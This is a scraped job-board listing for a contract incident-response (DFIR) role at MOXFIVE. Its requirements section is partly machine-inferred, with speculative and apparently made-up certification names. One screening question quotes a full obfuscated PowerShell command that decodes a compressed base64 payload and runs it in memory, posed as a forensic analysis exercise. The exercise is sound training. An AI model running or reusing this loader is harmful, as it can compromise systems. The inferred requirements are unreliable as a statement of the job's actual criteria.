moxfive - International Contract Bench, Incident Response (DFIR)
Upload My Resume
Drop here or click to browse · Tap to choose · PDF, DOCX, DOC, RTF, TXT
Requirements
• Experience responding to threat activity as an IR consultant or SOC analyst. No specific years of experience stated; however, the posting implies a need for at least some professional level experience in incident response and security analysis. It is reasonable to infer that MOXFIVE would require candidates with substantial practical knowledge due to their role on live support work which involves real cases. • Strong understanding of Windows/Mac/Linux fundamentals, forensic artifacts, BEC (Business Email Compromise) analysis, and network analysis. No specific years or education level stated; however, the posting implies a need for knowledge in these areas as they are listed among what you'll bring to the role. • Existing knowledge of cloud computing environments such as Azure, GCP, AWS is mentioned but no required experience levels specified beyond "expanding your knowledge." This suggests that while not mandatory at this stage, some familiarity with or willingness to learn about these platforms would be beneficial for a candidate considering the growing frontier in threat investigation. • Must have certifications relevant to incident response and digital forensics (e.g., Certified Incident Handler [CIH], GIAC Certified Forensic Examiner Analyst [CFEA]). No specific certificates mentioned, but this is a common requirement within the industry that would likely be expected by MOXFIVE based on their focus and description of work they do. • Must have skills in using forensic scripts to analyze suspicious activity (implied from "You’ve got a “Tools” folder sitting on your workstation somewhere with your favorite forensic scripts at the ready"). No specific years or education level stated, but proficiency and experience are implied. • Must have skills in identifying legitimate users versus threat actor activities based on their keen sense of observation (implied from "You’ve honed a keen sense..."). Again no explicit requirement for this skill set is mentioned; however, it's an essential part of the role as described and would likely be expected. • Must have skills in handling live response work at client sites or environments without committing all waking hours (implied from "You’d love to get your fix on some live response data..."). No specific years experience stated, but it's implied that candidates should already possess this skill set as they are described as weekend warriors and late-night crusaders. • Must have skills in investigating the latest threats across various platforms (Azure, GCP, AWS) including account takeovers which is considered new malware after all (implied from "you’ve been starting to expand your knowledge on cloud-native forensics"). No specific years or education level stated. • Must have skills in threat intelligence and an investigative mindset as the role involves solving real
Responsibilities
• Responding to threat activity as an IR consultant or SOC analyst. • Strong understanding of Windows/Mac/Linux fundamentals and forensic artifacts. • BEC analysis skills. • Network analysis capabilities. • Experience with cloud-native environments, including Azure, GCP, AWS, SaaS Apps. • Ability to differentiate between legitimate users and threat actor activity based on experience of seeing them in action hundreds of times. • Curiosity about new threats and a desire to solve real cases at an intensity compatible with personal life.
Benefits
• Upload your resume here to autofill key application fields. • Drop your resume here! • Parsing your resume. Autofilling key fields... • or drag and drop here • What’s your favorite forensic artifact and why? • You find the following malicious PowerShell command during your investigation. What does it do? %COMSPEC% /b /c start /b /min powershell -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASAA0AHMASQBBAEMAMgBKAHAAVwBVAEEALwA2AFYAWABhADQAKwBpAFMAQgBmACsAMwBQADQASwBQAG4AUwBpAFIAcgB1ADkAWAA3AHIAZgBUAEQASwBBAGkAawBoAGoAbwAzAGoAQgA3AHUAMQAwAG8AQwBnAEYAQgBRAHEAaABVAEgARgAzAC8AdgBzAGUAUQBIAHQANwAzAHAAbgBKAFQAcgBJAG0AeABLAHEAaQB6AHUAMgBwADUANQB3ADYAcQBKAGoAZQBxAFQAUwB3AEUAWgBXAEoAaQBaAG0ANwBCAFEANQBDAG0AMwBoAE0AUABaAGUANwA3AFIARwBSAE0AbAArAFkAcgAvAG4AYwBPAHYASQBRAFQAWgBhAFQAdwBmAHMARwAwADMAYwAvAEkATwBoAGQATgA4ADAAQQBoAHkASAB6AFoAKwA1AEcAMABRAFAAZABaAFEAcQAzAEIAegAxADQAZAA0AGsAWgBPAGIAagBNAHAASgBOAGsASQB6AGEAagBBAEIAZAB2AGIAbgBJADMANgBWAEwAawBoAGYAbwBhAHYAMwBzADYAdABRAC8ANAAzAGMAWABVAEkAbQBZAEkAaABnAHEAdgByAE8ALwAzAGkASwB2AGIAMwB0AHYAagBJAHgAOABGAEEAZgBaAG8ATgByADgAWABNAEcAWABEAEUATAB1AEcAWQArAE8AdwBVAEcAVAArAFkAcABZAFcARAB2AEQAZABzADcASABGAGkARABKAC8ATQByAGYAdgA5ADQASgBEAEQATgAyADUAYgBJAHQANQBIAFYAawBRAEUATwB1AFoAeQBiAHMAbgBnAHMAQQBjADgAZQA1AFYAMwA3AEYAcABJAGYALwBIAEgALwBuAGkANgAxADMAdAA3AGIANgAvAGoAMwBRAG4ATABPAFQAVgBPAEsAVABZAHYAVABjAGQASgAxADkAawB2AGgAVQBUAGcANwBQAFkAeAA0AFcAOABiAEsATwBBAGgARwBSAE4ANwA1AGUAMgAxADYAagBmAHoAMQBQAHYAeAA2AG4AegBjAHUAWgA3AHYAbgBpAEoAYgBPAFAAcgBFAE0AZQB2AGcAMAB5ADAAWgBqAEsARgBQAEEAdwBWAHcASQBiAE4ATQBNAHkAWABtAGQAZgBFADMAdQB2AGIARwAvAFAAMQB3ADUAdABwADUARgBIAGIAeABmAGUAaQBSADMARgBBAGYAQgBVAEgAQgB4AHYAaAA4AEgANgBvAGUANgBhAEQAcAAzAGcATgBZAHYAawBRAGoAcwAvAGIANQBJAHYAZwBSAEkAQgBwAEYASABpAFoAQQArAEEATAB5AEIAMwBJAEQAaABkAHUAdgBjAGgAeAB5AHEARAAzADkAWABmADEAdgBoAFgARwArAEgAZwBGADkAMwBlAEYAQwBwACsARgBZAEoAZABDAGcAMgBMADUAdwBvAG4AZgBnAFEATQBZAEMATAB6AEoAMQBFAEUANABQADMAagAvAGkAVgB4AEYAKwBQADEAQQBzAEcATAB1AFcAKwA0AG4AVgBEAFcAeABnAHoAYwA2AHgAZQA4AFUAOABQADMARQAxAGQAegBOAHoAVwBzADYAeABCAEIAUABRAFMARwBoAG4AYwBwADkAWQBhAHAAbABSAGcAWQBuAGQARQBxAEMATwBEAG4ATwBXAFIARABoADQAdABzAC8ANQA1AE8AWgB2AFUAcQBHADUAVgA4AHEAcQBsADIAbABMAGoATABaADgAVwBSACsAZgBHAEYAZQBGADgAUQAyADMAMwBJADMAeABkAHkARgBQAGMAbgA2AHUAeABIAFoAagBvAG0ARAA1AFAAMgB2AHMANgBHAEgAMQA3AGEASABlADcARwBuAHUAegBhADYARQB2ADQANwArAEsAOQBuAGgAdABjAE8AVABCAFAAaQBYADcAZQBOAHcAYwA5AEMALwB2AEkAQwBtADcAMABMAE8AZwBBADQAVQBQAEIASABzAGIANQByADAAdwA5AFoATABuAE8ATwBSAFgARAB1AEkAWABnAEYAbABDAGgAKwA3ADAAeAAyAGgAbwBXADgANgBNAG4AWQBCAGYAeQB5AE8AZABEADAAZABnADEAcABoAHEAKwA3AEwANgBrAFYAWAA2ADAAbgA4ADQAVABMAHYASwBPAEgAWQBaAGwAUgBJAHMAaAB6AFYARwBaAFUAcgBEAHYAWQBMAEQATwBzAEYAOQBxAFgAVgAyAHgARQBTAFQAcABNAE0AdQBiAGkAcgBoAHcANQAxAEUAWgA2AFMASwAvAHEAMwBxADQASgArAFIAbgBTAGkAMgBtAGUAZQBKAEEAeABFAFkATABUAEIAUgBoAG0AcQBvACsAUgByAFQAcwBKAEsAbQBWAG0AYQBKAHUAWQBpADEAVgA3AGMAMwBYAGgAawA1AEYAUABtAFAAQwA2ADQAMABEAEsAZwBhAFkARABuAEEAbQBzAEoARgBpAG8ATgBPAEYATQBBAE4ANwArAEgAegArAEsAOQAxAEIAawBSAGQAZAAzAHMAQQB1ADcAMAB5AG8AMABjAFAAUQBOADEASgB4AEwAUgBxAFYAMAAwAHoAZgBZAC8ASwBnAGoAUAAzAEgANwBtAGkAZABaAFUAaQBSAFkAWABVAEgANgA1AEQAUQBRAFEASABVAEkATABUAE0ATABPADYAQgBRADEAeABMAGMALwA0ADkANAAvADgAMgA5ADcAMAB2AE0AZAAyADcAeQBBAGIANABjAFoAQwBGAE4AeABGAGMAdQBwAGsAbQA2AHAARAB0AFIAYwByAGsAQQBwAFMAOQBZAHAAcwBnAEYARgBGAEEAYgBCAE0AVABsADkAQgBDADMAbQA4AGsAdAA1AEcAMABLACsAVwAzAHIAMABFAGEATgA4AGIAbABmADIAUwA4AG4AKwA3ADUAVwA0AGcAYwA5AGUAQwByAHcAZQBDAFYAMgBZAEsAegBsAFMAVwBzAHgAbAArAFIASgBvAEsAeABuAEoAMQBGAEIAaQA0AGQAWgBHAEoAeABLAEsARgBDAG4AbQA3AGkALwBnADMAMwBiAFUAbQArAGcAbwBMADMAUwBsAEkAKwBIAGUAbgBoAEUATABiAFMAWABZAFkAMABHAEoAWgA3AE8AMABKADYAZgB6AE0ANQBCAGMAMQBxAHgAWQB2ACsAaQBKADUATwBmAFAAdQAyAE8AKwBoAEMAeAA3AFMAZQBWAGIAVwBtAGMAMwAwAC8AMgBhADIAagBQAEwAawByAEQAYgBoAFAARwBCADcAVAB2AE4AVQAyAFEASQB4AFgAUwBXAE4AUQBRAGsAVABoAHgATAA2AG0AUwB2AEkAdgBEAFUARgBwAGIAbABxAHYATQBJACsARgBVAFgAWABJAE4AMgBlAEEANABZAGcAbwAyAE0AcABUAGoAZABHAEcASwBzAGUAdABDAFQAQgBBAFgAdgArAFUAbgB1AHgARQA4AFEAbgBYAG4AOABGAFMAVgBmAFQALwBRAGsAbgBpAGwAdgB0AFEAVwBiAGYARQBGADgAYQBJAHQAZABLADAAWQBOAGUAUwBOAGUAQQBwADMAcABTAGkAdQBiAGEAWABWADEAagAwADgAZwBMAHgATQBBAEIATgBMAGEASQB5ADUAcwBJAEkAcwBVAGUAMQB2AFIARgBVADIAWABQADcARgBWAE0ARgBHAEsAZABDAE8ASQBTADgAYgAzAFMAcAAzAFIAcABYADkAVABOAEQAUQBWAGwAZwBlAEgAZQBHADQAcQBuAFgAVwBTADkAbQAzAFQANgBsADkAWQBYAFgAYwBqAEsAYQBRAC8AYwB0AFEAMwBFAHAARwBQAFcAeQBjAEcANQBFADIATwBxAE8AcQBKAEQAKwBRACsAZABDAHMANwBDAFYAMwBTAEkAeQA2AG8AVQArAGYAUwBLAEoAWABOAE0AYQBPAFMAQwBjAHcAbgBwAEQAagBUAHQAQQBtADkAZwBqAHMAbgBuAGgAMQBoAHMASAB1AGUAVABoAEcARQBJAE4ARQAyAFoAZQBxAEYARAAvAHIAdgBCAGoATAAyADcANABrAHUAOQBFAEkANABuAGoAVwBJAHcAOQAwAHQAMABLADAAaABYAFcAdAB0AC8ASgBIADMATwBJAHMAYwBLAGYAbQBhAEcAegBOAHUALwBMAFQAcwBGAHAAWgArAHEAWAA2AHMAMwBZADYAYgByAEcARgBEADgAdgA5ADUASwBCAEcAVQBkAGcANgBVADQARgBZAEIAOAB2AGQAOQArAFQAdABLAE8AVABjADQAVwBvAHgANwBHADYARQBxAEMAVwBYADYAdQB4AFQAeAAxAGMAYQBoADgATwBvAFcAagBKADcAMwBhAEQAYgA0AG4AWQBIAFMALwBKAGEAdgBFAEYAcQArAGcAbgBQAEsANQByAHMAcwB0AHkASwAwADcAYgBpAGYARwBCAFYAaAArAHAAQwBMAGcAMwBaAG4AVAA0ADgAZABWAFcAdAAvADIASgBPAGEAbQBPAGoAegB4ADAAeABlAHgASwBIAGcAdABWAGYARAAzAGIAVwBUAEwASABaADkAdABnAFoAUwA5AHAAOABMAE0ANwBqAGkAVAA2AGMASQBzAFMAeAAzAEUAeABSAHoAZABsADAAVQBlAFAAVgBnAGUAeQB4AFUANgBJAGwAKwBsAEkAZABWAFcAcwBtAHoANAA3AHQAOABjADQAWAB4AFIAaQBkAHgASQBWAGYAdwB0AG8AegA0AGMATABEAFEAbABEAGEAMwBLAHIAeQBJAG4AWQA1ADcAVQBqAEYANQA3ADMAUQBkAEcAYQBEAFIAcgB0AGkAZABiAHEAMQBTAEkAMgBrAEoAKwBRAHMAeQBVAE8ALwBIAGMAOABQADQANwA0ADQAMQBsADQAbQA2AC8AbQBxAHEAYQAyADEANgBYADYAdAAxAGwAbgBOAEoAcQB2AFIAdwA4AGkAUgBtAG4AYQBuAG8AbgBKAEIANgB5AFYAYwA5AEIAcwBlAE0ATgB4ADIAeABxAEgAaABWADgAegB1AFkAdgBNAGkAYQB0AE8AVwBpAG8AVABGAFQAZwB5AFEASgB1AG4AagBRADIAZQB5AE0AKwBYAG0AcwBzAFAAdgBhAHQAaQBlAE8AaQAzAFAAZABvAHgAcAA3AGUARABiAHQARwBhAFkAaABxAFUANABMACsAMQBwAG8ANgA1ADAAZAByAE8AYQB0AEQAeAB5AG4AZQBsADYAaABzACsAbQBXADcAVQBFACsANQBrAGIAcQArAG8AVABVAGwAMQB1AE0AeABCAEUAWgBlAGEAVAAzAGwAUABvAGIAWgBVAGwAUABqAC8AMABqAEYASABGADYATwA4ADYAVQBBADUAaQBhAGQARgBaAGQAcQBaAE4AKwBTAEEAagBqAGkAeABxAFIAegByAFoAQgB0AEsAcQBaAGkAeQAxADAAZgA2AEkARABhAEcAaQBkAEMAVABuAHAAVABmAHEAeABlADAASgBHADkAVgBGAEwAcAB6AGIAKwArAE8AegBXAEEAcABPAHIAZABuAG8ATABEAFEAVgBvAGEAbwBDAEYANgAzAGQARwBYAGkAOABCAFUANABiADgASgB4AFIAUABEAEcAawBCADcAUgB4AGcARwBOAE4AMgBVADkAeQA1AFkAegAyAHgAQgBhAFYALwBYAHoARQAwAGYATQBjADUAaQBJAC8ATgAxAFoAWQBhACsAOQBXAHMAZgBzAFEAeQBFAE8ANgB0AHEAbwBvADYARQBHAE8ANgAwAHUAcAB3AHgAcwBsADAAcABhADMAWABGADgAZAAxAEsAcAA0AHkASwBFAGwAZQAxAHkAeABRAHEAMgBxAEQANABkAHAANwBoADIAVABDAHIAWQBtAEEAZgBRAGsAcAArAFMAZQAvAHgAOABEAC8AMwBjAE8AegBhAHAAWgBVAHEATwBnAE0AawBIAFIAUwA5AFoATABwAFcATABTAEsAMwB5ADgAZQBiADAAOQB2AFYAMQA3AHUANAAvADUAbgBYAEUAQwBiAGIAVgBhAEsAeQBsADQANgBhAHQARAAwAGcARAArAFcANQBzAGwANgAwAEYAbwA2AFEANgBVAFAAKwBoADYAcgBuAGYAVwBnAEEAUwBEAFMAKwArAGkARQBEAHUAUgBLAEIAUgArADMAbQA3AHYAYwBPAEIAaABCADEAcABSAGEARgBhAHYAbABaADUAMQBIAEkASwBTAGIAdQBzAFgAYgBRAC8AMABmAGwAbABIADkAZwBZADMAMgBoAHkARwBqAGYAcABQAFIAMABYAG8AdwBpADgAYgBvAGMAWABLAFkAagBLAGkAOQBUAHIAdABTAEMANABSAFgAaAB1AHoANgA4AGIASAB4AHgAYwBJADcAMwBLAHgAcABDAGcAKwBZAFcAOQBEAHIAVABKAFQAUABUAFcAcQBWAFcAaQBuAHEAcQBkAG0AdABaAGoANwBmAFYAaAA0ADQAcwBkAFoAdQA1AGUAbwBBAC8AbQBMADgAcwB5AFQAegA1AGEAYwAxAEIASQBjAGEAMwBiAFAAUgBaADcANwArAFoANwA1AHIAdwBmAHcAbgBkAEYALwBoAHoAWQBCAEwAMgAzAHEAUABxAEIATABIAGYAbwA1AFgAcwBWAGMALwBtAHMAdQBKADYANwAvAEEAZgB6AHgATQBiAFQAUAA4AE0AbQBDADkAMAB3ADMASgBWADkASQA5AFkARABlAGIAWQBrAEIAMwB6AGYAcABoAFYAMgA0ADEAWQB1AE0AMgBOAGUAWQBXADUAMwA1AHgAdAB4AEIAZQBHAHoAWQBxAE0ATgBIAFQAcgBDAEoAawB0AHUAYgB5AGIANwBaAC8AbQBLAE8AdQBwADAASgAvAHMAVgBNAE0AYwBMAFEAYwA5ACsATgBpAEEARQBzAHgAZABDAEUASgBhAHAAVABKAGMAbgBtADMATABmAGMAMwB3AG8ANAB0AFMANABFAEQAZwBBAEEAIgApACkAOwBJAEUAWAAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAFMAdAByAGUAYQBtAFIAZQBhAGQAZQByACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAkAHMALABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAOwA= • On a scale from “white and fluffy” to CloudTrail Creator, how would you rate your cloud-native forensics skills across AWS, GCP, and Azure Cloud? • What’s your availability look like on an average week to take on live response analysis work?
No credit card. Takes 10 seconds.